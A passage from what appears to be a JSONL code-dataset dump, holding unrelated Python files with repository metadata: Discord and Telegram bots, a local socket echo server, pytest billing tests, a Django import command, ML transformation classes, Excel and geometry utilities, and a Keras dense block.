reject(self, interaction: discord.Interaction, button: discord.ui.Button):\n self.embed.description = 'Operación cancelada!'\n self.embed.failure()\n await interaction.response.edit_message(embed=self.embed.get_embed(), view=None)\n\n\nasync def add_money(ctx: Context, user: discord.User, money: int):\n try:\n money = int(money)\n if money < 1:\n raise\n except:\n raise MoneyError(min=1)\n embed = Embed(title='Entrega de dinero', description=f'Seguro que quieres **entregar** {int(money):,} 💰 a {user.mention}?', user=ctx.author).warn()\n await ctx.channel.send(embed=embed.get_embed(), view=Buttons(ctx, user, money, embed, True))\n\n\n\nasync def remove_money(ctx: Context, user, money: int):\n try:\n money = int(money)\n if money < 1:\n raise\n except:\n raise MoneyError(min=1)\n embed = Embed(title='Entrega de dinero', description=f'Seguro que **quitar** dar {int(money):,} 💰 a {user.mention}?', user=ctx.author).warn()\n await ctx.channel.send(embed=embed.get_embed(), view=Buttons(ctx, user, money, embed, False))\n","repo_name":"AlguienSama/discord-bot-python","sub_path":"commands/admin/commands/economy.py","file_name":"economy.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29886618966","text":"import socket\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_addr = ('127.0.0.1', 41903)\nserver.bind(server_addr)\nprint('服务器开启')\nserver.listen()\nwhile 1:\n try:\n conn, conn_addr = server.accept()\n except Exception:\n break\n while 1:\n try:\n msg = conn.recv(65535)\n if not msg:\n break\n msg = msg.decode()\n print('收到{}的消息:{}'.format(conn_addr, msg))\n return_msg = '已收到消息'+ msg\n conn.send(return_msg.encode())\n except Exception:\n break\n conn.close()\n print('{}的链接断开'.format(conn_addr))\nserver.close()\nprint('服务器断开')","repo_name":"ljpqjppp/socket","sub_path":"less0401/ser3.py","file_name":"ser3.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29046929997","text":"# -*- coding: utf-8 -*-\n\nimport decimal\n\nimport pytest\nimport hamcrest\n\nfrom btestlib import utils\nfrom btestlib import constants\nfrom balance import balance_steps\nfrom check import shared_steps, shared\nfrom btestlib.data import partner_contexts\n\n\nCONTEXT = partner_contexts.FOOD_RESTAURANT_CONTEXT\nRESTAURANT_COMPLETION_SERVICE = constants.Services.FOOD_SERVICES\n\n\nclass States(object):\n missing_in_food = 1\n missing_in_billing = 2\n amount_mismatch = 3\n\n\ndef create_client():\n client_id, person_id, contract_id, _ = balance_steps.ContractSteps.create_partner_contract(\n CONTEXT, is_offer=1, additional_params={'start_dt': shared_steps.COMPLETION_DT})\n return client_id\n\n\ndef create_balance_completions(client_id, commission_sum='100',\n service_id=RESTAURANT_COMPLETION_SERVICE.id):\n balance_steps.PartnerSteps.create_fake_product_completion(\n shared_steps.COMPLETION_DT, client_id=client_id,\n service_id=service_id, service_order_id=0,\n commission_sum=decimal.Decimal(commission_sum),\n currency=CONTEXT.currency.iso_code,\n type=constants.FoodProductType.GOODS,\n transaction_dt=shared_steps.COMPLETION_DT,\n )\n\n\ndef format_yt_data(client_id, commission_sum='100',\n service_id=RESTAURANT_COMPLETION_SERVICE.id):\n return {\n 'client_id': client_id,\n 'commission_sum': commission_sum,\n 'dt': shared_steps.COMPLETION_DT,\n 'service_id': service_id,\n 'currency': CONTEXT.currency.iso_code,\n 'type': constants.FoodProductType.GOODS,\n }\n\n\n@pytest.mark.shared(block=shared_steps.SharedBlocks.RUN_CBF)\nclass TestCbf(object):\n def run_cmp(self, shared_data, before):\n cmp_data = shared_steps.SharedBlocks.run_cbf(shared_data, before, pytest.active_tests)\n return cmp_data or shared_data.cache and shared_data.cache.get('cmp_data') or []\n\n def test_without_diff(self, shared_data):\n with shared.CheckSharedBefore(shared_data=shared_data,\n cache_vars=['client_id', 'yt_data']) as before:\n before.validate()\n\n client_id = create_client()\n create_balance_completions(client_id)\n yt_data = format_yt_data(client_id)\n\n cmp_data = self.run_cmp(shared_data, before)\n\n clients = set(row['client_id'] for row in cmp_data)\n utils.check_that(clients, hamcrest.not_(hamcrest.contains(client_id)))\n\n def test_skip_9999_service(self, shared_data):\n with shared.CheckSharedBefore(shared_data=shared_data,\n cache_vars=['client_id', 'yt_data']) as before:\n before.validate()\n\n client_id = create_client()\n\n inner_service_id = 9999\n create_balance_completions(client_id, service_id=inner_service_id)\n yt_data = format_yt_data(client_id, service_id=inner_service_id)\n\n cmp_data = self.run_cmp(shared_data, before)\n\n clients = set(row['client_id'] for row in cmp_data)\n utils.check_that(clients, hamcrest.not_(hamcrest.contains(client_id)))\n\n def test_missing_in_food(self, shared_data):\n with shared.CheckSharedBefore(shared_data=shared_data,\n cache_vars=['client_id']) as before:\n before.validate()\n\n client_id = create_client()\n create_balance_completions(client_id)\n\n cmp_data = self.run_cmp(shared_data, before)\n cmp_data = [(row['client_id'], row['state']) for row in cmp_data\n if row['state'] == States.missing_in_food]\n\n utils.check_that(cmp_data, hamcrest.has_length(1))\n\n expected = [(client_id, States.missing_in_food)]\n utils.check_that(cmp_data, hamcrest.equal_to(expected))\n\n def test_missing_in_billing(self, shared_data):\n with shared.CheckSharedBefore(shared_data=shared_data,\n cache_vars=['client_id', 'yt_data']) as before:\n before.validate()\n\n client_id = create_client()\n yt_data = format_yt_data(client_id)\n\n cmp_data = self.run_cmp(shared_data, before)\n cmp_data = [(row['client_id'], row['state']) for row in cmp_data\n if row['state'] == States.missing_in_billing]\n\n utils.check_that(cmp_data, hamcrest.has_length(1))\n\n expected = [(client_id, States.missing_in_billing)]\n utils.check_that(cmp_data, hamcrest.equal_to(expected))\n\n def test_amount_mismatch(self, shared_data):\n with shared.CheckSharedBefore(shared_data=shared_data,\n cache_vars=['client_id', 'yt_data']) as before:\n before.validate()\n\n client_id = create_client()\n create_balance_completions(client_id, commission_sum='100')\n yt_data = format_yt_data(client_id, commission_sum='111')\n\n cmp_data = self.run_cmp(shared_data, before)\n cmp_data = [(row['client_id'], row['food_amount'], row['billing_amount'], row['state'])\n for row in cmp_data if row['state'] == States.amount_mismatch]\n\n utils.check_that(cmp_data, hamcrest.has_length(1))\n\n expected = [(client_id, 111, 100, States.amount_mismatch)]\n utils.check_that(cmp_data, hamcrest.equal_to(expected))\n\n# vim:ts=4:sts=4:sw=4:tw=79:et:\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"billing/balance_tests/check/tests/test_cbf.py","file_name":"test_cbf.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"25214212701","text":"import os\nimport xml.etree.ElementTree as ET\n\nimport django\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom interface.models import Review, Item\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mentorship.settings')\n\ndjango.setup()\n\n\nclass Command(BaseCommand):\n def _save_review(self, reviews, is_positive):\n saved_reviews = []\n if reviews != '':\n review_list = [review.strip() for raw_reviews in reviews for review in raw_reviews.split(',') if review]\n reviews_with_occurrences = [(review, review_list.count(review)) for review in set(review_list)]\n for review in reviews_with_occurrences:\n saved_review = Review.objects.create(description=review[0].strip(), is_positive=is_positive, occurrences=review[1])\n saved_reviews.append(saved_review)\n return saved_reviews\n\n def _save_data_from_xml(self):\n file_path = os.path.join(os.path.join(os.path.join(os.path.join(os.path.join(settings.BASE_DIR, '..'), 'scraper'), 'Output'), 'all'), 'final_reviews.xml')\n xml_file = ET.parse(file_path)\n root = xml_file.getroot()\n for item in root:\n xml_positive_reviews = []\n xml_negative_reviews = []\n saved_item = None\n created = None\n for properties in item:\n if properties.tag == 'name':\n print(f'--- ---Saving data for: {properties.text}')\n saved_item, created = Item.objects.get_or_create(name=properties.text)\n if not created:\n print(f'--- --- ---Item already exists. Skipped')\n\n if properties.tag == 'review' and saved_item and created:\n xml_negative_reviews.append(properties.get('negative'))\n xml_positive_reviews.append(properties.get('positive'))\n\n if saved_item:\n for review in self._save_review(xml_negative_reviews, False):\n saved_item.reviews.add(review)\n\n for review in self._save_review(xml_positive_reviews, True):\n saved_item.reviews.add(review)\n\n def handle(self, *args, **options):\n print('--- Saving data from xml')\n self._save_data_from_xml()\n print('--- Done ---')\n","repo_name":"ionutlng/Analyse-Amazon-products-reviews","sub_path":"scraper_interface/interface/management/commands/save_data_from_xml.py","file_name":"save_data_from_xml.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"74859186961","text":"\"\"\"Data transformations.\n\nScientific Machine Learning Benchmark: \nA benchmark of regression models in chem- and materials informatics.\n(c) Matthias Rupp 2019, Citrine Informatics.\n\nDataTransformations are functors (function objects) that can be fitted \nto data and then applied to transform (other) data.\nExamples include samplers, featurizers, preprocessors, and learners.\n\nDesign decisions:\n* smlb objects are light-weight. Since fitting is potentially\n data-intense, it can not be done in the initializer. Hence\n fitting is done in a separate method.\n* Some transformations return Data, some return something else,\n for example, learners can return predictive distributions.\n Therefore, two types of DataTransformation are distinguished:\n transformations from and to Data, and transformations from\n data to something else. The latter would terminate chains of\n transformations: \n data_1 -A_1-> data_2 -A_2-> ... -> data_n-1 -B-> data_n,\n where A are data-to-data and B are data-to-other transformations.\n\"\"\"\n\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Any, Sequence\n\nimport numpy as np\n\nfrom smlb import BenchmarkError, InvalidParameterError\nfrom smlb import Data, complement\nfrom smlb import SmlbObject\nfrom smlb import is_sequence\nfrom smlb import params\n\n\nclass DataTransformation(SmlbObject, metaclass=ABCMeta):\n \"\"\"Abstract base class for data transformations.\n\n A DataTransformation is a function object that can be fitted on\n training data and applied to (other) data to return transformed data.\n Its interface contains two functions, fit() and apply().\n\n Provides:\n fit: accepts data, setting internal state\n apply: accepts and returns transformed data.\n \"\"\"\n\n def fit(self, data: Data) -> \"DataTransformation\":\n \"\"\"Adjusts internal state based on data ('fitting', 'training').\n\n Parameters:\n data: training data\n\n Returns:\n self, to allow chaining\n\n Example:\n DataTransformation(...).fit(data).apply(otherdata)\n \"\"\"\n\n return self\n\n @abstractmethod\n def apply(self, data: Data) -> Any:\n \"\"\"Transforms data.\n\n Parameters:\n data: data to transform\n\n Returns:\n transformation result; can be derived from Data, but does not have to be\n \"\"\"\n\n raise NotImplementedError\n\n\nclass DataValuedTransformation(DataTransformation):\n \"\"\"Abstract base class for all transformation that return Data.\n\n The apply() method returns an object derived from Data.\n \"\"\"\n\n @abstractmethod\n def apply(self, data: Data) -> Data:\n \"\"\"Transforms data.\n\n Parameters:\n data: data to transform\n\n Returns:\n transformed data\n \"\"\"\n\n raise NotImplementedError\n\n\nclass DataPipelineTransformation(DataValuedTransformation):\n \"\"\"Pipeline of data-valued transformations that are applied sequentially.\"\"\"\n\n def __init__(self, steps: Sequence[DataValuedTransformation], *args, **kwargs):\n \"\"\"Initialize state.\n\n Parameters:\n steps: List of data-valued transformations\n \"\"\"\n super().__init__(*args, **kwargs)\n steps = params.sequence(steps, type_=DataValuedTransformation)\n self._steps = steps\n\n def fit(self, data: Data) -> \"DataPipelineTransformation\":\n \"\"\"Fit each step.\n\n Steps are fit sequentially and used to transform the data.\n The transformed output of each step is used as the training data for the next step.\n\n Parameters:\n data: training data\n\n Returns:\n self, to allow chaining\n \"\"\"\n for step in self._steps:\n data = step.fit(data).apply(data)\n return self\n\n def apply(self, data: Data) -> Data:\n \"\"\"Apply each step sequentially.\n\n The transformed output of each step is used as the training data for the next step.\n\n Parameters:\n data: data to transform\n\n Returns:\n transformed data\n \"\"\"\n for step in self._steps:\n data = step.apply(data)\n return data\n\n\nclass IdentityTransformation(DataValuedTransformation):\n \"\"\"Returns data unchanged.\"\"\"\n\n def apply(self, data: Data) -> Data:\n \"\"\"Return data unchanged.\n\n The identity transformation.\n\n Parameters:\n data: any data\n\n Returns:\n unchanged data\n \"\"\"\n\n return data\n\n\nclass InvertibleTransformation(SmlbObject, metaclass=ABCMeta):\n \"\"\"Abstract mix-in base class for invertible transformations.\n\n For DataTransformations that are invertible in the loose sense that\n data -> transformation -> inverse transformation yields data related\n in some way to the original inputs. In particular, inversion does not\n need to be exact, for example, dimensionality reduction might return\n original data points only up to projection onto the learned subspace.\n\n After fitting, use 'inverse()' to retrieve the inverse data transformation:\n f = transformation(...).fit(training_data);\n f.inverse().apply(f.apply(other_data)) # \"close\" to identity in some sense\n\n The inverse transformation must be a DataValuedTransformation.\n \"\"\"\n\n @abstractmethod\n def inverse(self) -> DataValuedTransformation:\n \"\"\"Return inverse of DataTransformation.\"\"\"\n\n raise NotImplementedError\n\n\nclass DataTransformationFailureMode:\n \"\"\"Provide failure mode handling for 1:1 data transformations.\n\n Provides utility functionality for one-to-one data transformations (mapping one input sample\n to one output sample) to handle failed transformations of individual samples.\n \"\"\"\n\n def __init__(self, failmode, num_samples: int):\n \"\"\"Initialize failure handler.\n\n Parameters:\n failmode: how to handle failed descriptor calculations, either due to rejected SMILES\n encodings or failing descriptor code. Possible values:\n \"raise\" [default]: raise a BenchmarkException\n \"drop\": drop the sample. Returned Data will have fewer samples\n (\"mask\", mask): where `mask` is a NumPy array with dtype bool whose entries will\n be set to False for failures\n (\"index\", index): where `index` is an empty list to which the indices of failed\n entries will be appended\n num_samples: number of samples that are transformed\n \"\"\"\n\n self.num_samples = params.integer(num_samples, from_=0)\n self.failmode = self.failmode(failmode)\n\n if is_sequence(self.failmode) and self.failmode[0] == \"mask\":\n self.failmode = \"mask\"\n if len(failmode[1]) != self.num_samples:\n raise InvalidParameterError(\n \"failure mode mask length of {self.num_samples}\", len(self.mask)\n )\n self.mask = failmode[1]\n self.mask.fill(False)\n\n if is_sequence(self.failmode) and self.failmode[0] == \"index\":\n self.failmode = \"index\"\n self.index = failmode[1]\n\n self.failures = [] # list of indices of failed samples\n\n @staticmethod\n def failmode(failmode):\n \"\"\"Failure mode.\n\n Validate that argument is failure mode, similar to smlb.params.\n See __init__ for valid values.\n \"\"\"\n\n ipe = InvalidParameterError(\"valid failure mode specification\", failmode)\n\n if failmode in (\"raise\", \"drop\"):\n return failmode\n\n if not (is_sequence(failmode) and len(failmode) == 2):\n raise ipe\n\n if (\n failmode[0] == \"mask\"\n and isinstance(failmode[1], np.ndarray)\n and failmode[1].ndim == 1\n and failmode[1].dtype.name == \"bool\"\n ):\n return failmode\n\n if failmode[0] == \"index\" and isinstance(failmode[1], list) and len(failmode[1]) == 0:\n return failmode\n\n raise ipe\n\n def handle_failure(self, i):\n \"\"\"Take action according to failure mode.\n\n Parameters:\n i: index of failed sample\n \"\"\"\n\n if self.failmode == \"raise\":\n raise BenchmarkError(f\"DataTransformation failed for sample #{i}\")\n elif self.failmode in (\"drop\", \"mask\", \"index\"):\n self.failures.append(i)\n else:\n raise BenchmarkError(f\"Internal error, unknown failure mode {self._failmode_failmode}\")\n\n def finalize(self, data: Data) -> Data:\n \"\"\"Change dataset according to registered failures and failure mode.\n\n Parameters:\n data: transformed Data\n\n Returns:\n Transformed Data after handling failures.\n \"\"\"\n\n self.failures = sorted(list(set(self.failures))) # remove duplicate indices\n\n if self.failmode == \"raise\":\n if len(self.failures) > 0:\n raise BenchmarkError(\"DataTransformation failed for some samples\")\n return data\n elif self.failmode == \"drop\":\n return complement(data, data.subset(self.failures)) # todo: duplicates?\n elif self.failmode == \"mask\":\n self.mask[self.failures] = True\n return data\n elif self.failmode == \"index\":\n self.index.extend(self.failures)\n return data\n\n raise BenchmarkError(f\"Internal error, unrecognized failure mode '{self.failmode}'\")\n","repo_name":"CitrineInformatics/smlb","sub_path":"smlb/core/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":9440,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"}
+{"seq_id":"7484839657","text":"#######################################################\n## Author: Ashish Anand\n## Date: 15 Dec 2011\n## Intent: To read bills.xlsx and check who paid for this amount. Also perform some sanity testing\n## Requirement: Python Interpretor must be installed\n#######################################################\nfrom openpyxl.reader.excel import load_workbook\nfrom openpyxl.cell import get_column_letter\nfrom Util.Temp import MakeTempCopy\nfrom Util.Decorators import memoize\n\n@memoize\ndef LoadNonIterableWorkbook(workbookPath):\n \"\"\"Helper function to load a workbook in an iterable fashion\"\"\"\n tempCopy = MakeTempCopy(workbookPath)\n loadedWB = load_workbook(tempCopy, use_iterators= False)\n #loadedWB = load_workbook(tempCopy, use_iterators= False, data_only=True)\n return loadedWB\n\n\n@memoize\ndef LoadIterableWorkbook(workbookPath):\n \"\"\"Helper function to load a workbook in an iterable fashion\"\"\"\n tempCopy = MakeTempCopy(workbookPath)\n loadedWB = load_workbook(tempCopy, use_iterators= True)\n #loadedWB = load_workbook(tempCopy, use_iterators= True, data_only=True)\n return loadedWB\n\n\n@memoize\ndef GetColValues(workbookPath, sheetName, colID):\n \"\"\"Returns the values of a specific column as a list.\n Called as GetColValues(path, name, \"A\")\n \"\"\"\n wb = LoadNonIterableWorkbook(workbookPath)\n ws = wb.get_sheet_by_name(sheetName)\n max_row = ws.get_highest_row()\n res = ws.range('{0}1:{1}{2}'.format(colID, colID, max_row))\n return [x[0].value for x in res]\n\n@memoize\ndef VLookup(workbookPath, sheetName, lookUpValue, lookUpColumn, correspondingColumn):\n \"\"\"Looks up the lookUpValue in lookUpColumn and returns the value in that row's correspondingColumn\"\"\"\n col1Values = GetColValues(workbookPath, sheetName, lookUpColumn)\n col2Values = GetColValues(workbookPath, sheetName, correspondingColumn)\n for i, val in enumerate(col1Values):\n if val == lookUpValue:\n for i2, val2 in enumerate(col2Values):\n if i == i2:\n return val2\n return None\n\n\ndef GetCellValue(cell):\n if hasattr(cell, \"value\"):\n return cell.value\n return cell.internal_value\n\ndef GetColLetter(x):\n return get_column_letter(x)\n\nimport os\nOS_TYPE_IS_NT = os.name.lower()=='nt'\n\ndef GetRows(workbookPath, sheetName, firstRow, includeLastRow):\n wb = LoadIterableWorkbook(workbookPath)\n ws = wb.get_sheet_by_name(sheetName)\n MAX_ROW = ws.get_highest_row()\n\n if includeLastRow:\n MAX_ROW = MAX_ROW + 1\n MIN_ROW = int(firstRow)\n rowNumber = 0\n\n for row in ws.iter_rows():\n rowNumber += 1\n if rowNumber < MIN_ROW: continue #We are not reading anything before MIN_ROW. This might save us from reading couple thousand lines.\n if rowNumber >= MAX_ROW: break\n yield row\n\n return\n","repo_name":"abhigitz/tracker","sub_path":"Util/ExcelReader.py","file_name":"ExcelReader.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"25355644670","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.integrate import trapz\r\nfrom PIL import Image\r\n\r\ndef find_nearest(array,value):\r\n idx = (np.abs(array-value)).argmin()\r\n return array[idx]\r\n\r\n# Simple mouse click function to store coordinates\r\ndef onclick(event):\r\n global ix, iy\r\n ix, iy = event.xdata, event.ydata\r\n\r\n # print 'x = %d, y = %d'%(\r\n # ix, iy)\r\n\r\n # assign global variable to access outside of function\r\n global coords\r\n coords.append((ix, iy))\r\n\r\n # Disconnect after 2 clicks\r\n if len(coords) == 2:\r\n fig.canvas.mpl_disconnect(cid)\r\n plt.close(1)\r\n return\r\n\r\nim = Image.open('bird.jpg')\r\nx = np.arange(-10,10)\r\ny = x**2\r\n\r\nfig = plt.figure(1)\r\nax = plt.imshow(im)\r\n\r\ncoords = []\r\n\r\n# Call click func\r\ncid = fig.canvas.mpl_connect('button_press_event', onclick)\r\n\r\nplt.show(1)\r\n\r\na = coords[0][0].astype(int)\r\n\r\nprint ('Integral between '+ str(coords[0][0].astype(int)) +' & ' + str(coords[0][1].astype(int))+' & ' +str(coords[1][0].astype(int)) + ' & '+str(coords[1][1].astype(int)))\r\n\r\n","repo_name":"offthewallace/Summer-2017","sub_path":"figclick.py","file_name":"figclick.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"}
+{"seq_id":"14798123825","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nfrom __future__ import division\nimport unittest\n\nfrom geo2d import P\nimport geo2d\n\nclass TestOrientedBB(unittest.TestCase):\n def testBBox(self):\n pts = [P(0, 6), P(10, 6), P(0, 0), P(10, 0)]\n bbox = geo2d.OrientedBB(pts, 0)\n\n for p in bbox.getRect():\n p = geo2d.P(int(p.x), int(p.y))\n self.assert_(p in pts)\n\n def testExtra(self):\n pts = [P(0, 6), P(10, 6), P(0, 0), P(10, 0)]\n bbox = geo2d.OrientedBB(pts, 2)\n\n epts = [P(12, 8), P(-2, 7), P(-1, -2), P(12, -1)]\n for p in bbox.getRect():\n p = geo2d.P(int(p.x), int(p.y))\n self.assert_(p in epts)\n\n def testMerge(self):\n pts1 = [P(0, 6), P(10, 6), P(0, 0), P(10, 0)]\n bbox1 = geo2d.OrientedBB(pts1, 0)\n\n pts2 = [P(12, 6), P(16, 6), P(16, 0), P(12, 0)]\n bbox2 = geo2d.OrientedBB(pts2, 0)\n\n pts = [P(0, 0), P(0, 6), P(16, 0), P(16, 6)]\n box = geo2d.OrientedBB([bbox1, bbox2])\n for p in box.getRect():\n p = geo2d.P(int(p.x), int(p.y))\n self.assert_(p in pts)\n\n def testXSect(self):\n pts1 = [P(0, 6), P(10, 6), P(0, 0), P(10, 0)]\n bbox1 = geo2d.OrientedBB(pts1, 0)\n\n pts2 = [P(12, 6), P(16, 6), P(16, 0), P(12, 0)]\n bbox2 = geo2d.OrientedBB(pts2, 0)\n self.assertFalse(bbox1.xsect(bbox2))\n\n pts2 = [P(8, 6), P(16, 6), P(16, 0), P(8, 0)]\n bbox2 = geo2d.OrientedBB(pts2, 0)\n self.assertTrue(bbox1.xsect(bbox2))\n\n def testContains(self):\n pts = [P(0, 6), P(10, 4), P(0, 0), P(10, -2)]\n bbox = geo2d.OrientedBB(pts, 0)\n\n self.assertTrue(bbox.test(P(0, 0)))\n self.assertTrue(bbox.test(P(3, 3)))\n self.assertFalse(bbox.test(P(-1, 0)))\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"rbianchi66/pyqt_md","sub_path":"src/geo2d/test_bbox.py","file_name":"test_bbox.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"24606043890","text":"#!/usr/bin/env python3\n\"\"\"\nDense block\n\"\"\"\nimport tensorflow.keras as K\n\n\ndef dense_block(X, nb_filters, growth_rate, layers):\n \"\"\"\n Dense block\n \"\"\"\n initializer = K.initializers.HeNormal()\n for layer in range(layers):\n batch1 = K.layers.BatchNormalization(axis=3)(X)\n activation1 = K.layers.Activation('relu')(batch1)\n conv1 = K.layers.Conv2D(filters=(4 * growth_rate),\n kernel_size=(1, 1),\n padding='same',\n kernel_initializer=initializer)(activation1)\n batch2 = K.layers.BatchNormalization(axis=3)(conv1)\n activation2 = K.layers.Activation('relu')(batch2)\n conv2 = K.layers.Conv2D(filters=growth_rate,\n kernel_size=(3, 3),\n padding='same',\n kernel_initializer=initializer)(activation2)\n X = K.layers.concatenate([X, conv2])\n nb_filters += growth_rate\n return X, nb_filters\n","repo_name":"Luffy981/holbertonschool-machine_learning","sub_path":"supervised_learning/0x08-deep_cnns/5-dense_block.py","file_name":"5-dense_block.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"72284832720","text":"import telebot\r\nfrom telebot import TeleBot, types\r\n\r\nTOKEN = 'Your token'\r\nbot: TeleBot = telebot.TeleBot(\"Your token\")\r\n\r\n\r\n@bot.message_handler(commands=['start'])\r\ndef welcome(message):\r\n markup = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n item1 = types.KeyboardButton(\"Let's start📚\")\r\n markup.add(item1)\r\n sti = open('images/sticker.webp', 'rb')\r\n bot.send_sticker(message.chat.id, sti)\r\n bot.send_message(message.chat.id, \"Welcome, {0.first_name}!\\n\"\r\n \"I'm - {1.first_name}, quote bot.\"\r\n \"\\nI will help you by choosing a quote\".format(message.from_user, bot.get_me()),\r\n parse_mode='html', reply_markup=markup)\r\n\r\n\r\n@bot.message_handler(content_types=['text'])\r\ndef lalala(message):\r\n if message.chat.type == 'private':\r\n\r\n if message.text == 'English🇺🇸':\r\n markup_reply_english = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_english = types.KeyboardButton(text='Life')\r\n button2_english = types.KeyboardButton(text='Love')\r\n button3_english = types.KeyboardButton(text='Humor')\r\n button4_english = types.KeyboardButton(text='Success')\r\n button5_english = types.KeyboardButton(text='Money')\r\n button6_english = types.KeyboardButton(text='Inspirational')\r\n markup_reply_english.add(\r\n button1_english, button2_english, button3_english, button4_english, button5_english, button6_english)\r\n bot.send_message(message.chat.id,\r\n 'Okay, please choose your genre of quote!', reply_markup=markup_reply_english)\r\n\r\n elif message.text == 'Russian🇷🇺':\r\n markup_reply_russian = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_russian = types.KeyboardButton(text='Жизненные')\r\n button2_russian = types.KeyboardButton(text='Любовь')\r\n button3_russian = types.KeyboardButton(text='Смешные')\r\n button4_russian = types.KeyboardButton(text='Мотивирующие')\r\n button5_russian = types.KeyboardButton(text='Деньги')\r\n button6_russian = types.KeyboardButton(text='Мужественность')\r\n markup_reply_russian.add(\r\n button1_russian, button2_russian, button3_russian, button4_russian, button5_russian, button6_russian)\r\n bot.send_message(message.chat.id,\r\n 'Окей, выберите свой жанр цитаты пожалуйста!', reply_markup=markup_reply_russian)\r\n\r\n if message.text == \"Let's start📚\":\r\n markup_wel = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n item1_wel = types.KeyboardButton(text=\"English🇺🇸\")\r\n item2_wel = types.KeyboardButton(text=\"Russian🇷🇺\")\r\n markup_wel.add(item1_wel, item2_wel)\r\n bot.send_message(message.chat.id, 'Choose one language', reply_markup=markup_wel)\r\n\r\n if message.text == 'More quotes on the topic of life':\r\n bot.send_message(message.chat.id, \"“Everything you can imagine is real.”\"\r\n \"\\n\\n― Pablo Picasso\")\r\n bot.send_message(message.chat.id, \"“Life isn't about finding yourself. Life is about creating yourself.”\"\r\n \"\\n\\n― George Bernard Shaw\")\r\n bot.send_message(message.chat.id, \"“I'm not afraid of death; \"\r\n \"I just don't want to be there when it happens.”\"\r\n \"\\n\\n― Woody Allen\")\r\n bot.send_message(message.chat.id, \"“Sometimes the questions are complicated and the answers are simple.”\"\r\n \"\\n\\n― Dr. Seuss\")\r\n bot.send_message(message.chat.id, \"“Life is like riding a bicycle. \"\r\n \"To keep your balance, you must keep moving.”\"\r\n \"\\n\\n― Albert Einstein\")\r\n\r\n if message.text == 'Life':\r\n photo = open('images/life.jpg', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, \"“You've gotta dance like there's nobody watching,\"\r\n \"\\nLove like you'll never be hurt,\"\r\n \"\\nSing like there's nobody listening,\"\r\n \"\\nAnd live like it's heaven on earth.”\"\r\n \"\\n\\n― William W. Purkey\")\r\n bot.send_message(message.chat.id, \"“You only live once,\"\r\n \"but if you do it right,\"\r\n \"once is enough.”\"\r\n \"\\n\\n― Mae West\")\r\n bot.send_message(message.chat.id, \"“Good friends, good books, \"\r\n \"and a sleepy conscience: this is the ideal life.”\"\r\n \"\\n\\n― Mark Twain\")\r\n bot.send_message(message.chat.id, \"“Life is what happens to us while we are making other plans.”\"\r\n \"\\n\\n― Allen Saunders\")\r\n bot.send_message(message.chat.id, \"“This life is what you make it. No matter what, \"\r\n \"you're going to mess up sometimes, it's a universal truth. \"\r\n \"But the good part is you get to decide how you're going to mess it up. \"\r\n \"Girls will be your friends - they'll act like it anyway. \"\r\n \"But just remember, some come, some go. \"\r\n \"The ones that stay with you through everything \"\r\n \"- they're your true best friends. Don't let go of them. \"\r\n \"Also remember, sisters make the best friends in the world. \"\r\n \"As for lovers, well, they'll come and go too. \"\r\n \"And baby, I hate to say it, most of them - \"\r\n \"actually pretty much all of them are going to break your heart, \"\r\n \"but you can't give up because if you give up, \"\r\n \"you'll never find your soulmate. \"\r\n \"You'll never find that half who makes you whole \"\r\n \"and that goes for everything. \"\r\n \"Just because you fail once, \"\r\n \"doesn't mean \"\r\n \"you're gonna fail at everything. Keep trying, \"\r\n \"hold on, and always, always, always believe in yourself, \"\r\n \"because if you don't, then who will, sweetie? \"\r\n \"So keep your head high, keep your chin up, \"\r\n \"and most importantly, keep smiling, \"\r\n \"because life's a beautiful thing and there's so much to smile about.”\"\r\n \"\\n\\n― Marilyn Monroe\")\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='More quotes on the topic of life')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'If you want more quotes on this topic click on the \"More quotes on the topic of life\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == \"More quotes on the topic of love\":\r\n bot.send_message(message.chat.id, \"“Love is like the wind, you can't see it but you can feel it.”\"\r\n \"\\n\\n― Nicholas Sparks\")\r\n bot.send_message(message.chat.id, \"“You don't love someone because they're perfect, \"\r\n \"you love them in spite of the fact that they're not.”\"\r\n \"\\n\\n― Jodi Picoult\")\r\n bot.send_message(message.chat.id, \"“If you can make a woman laugh, you can make her do anything.”\"\r\n \"\\n\\n― Marilyn Monroe\")\r\n bot.send_message(message.chat.id, \"“I'm selfish, impatient and a little insecure. \"\r\n \"I make mistakes, I am out of control and at times hard to 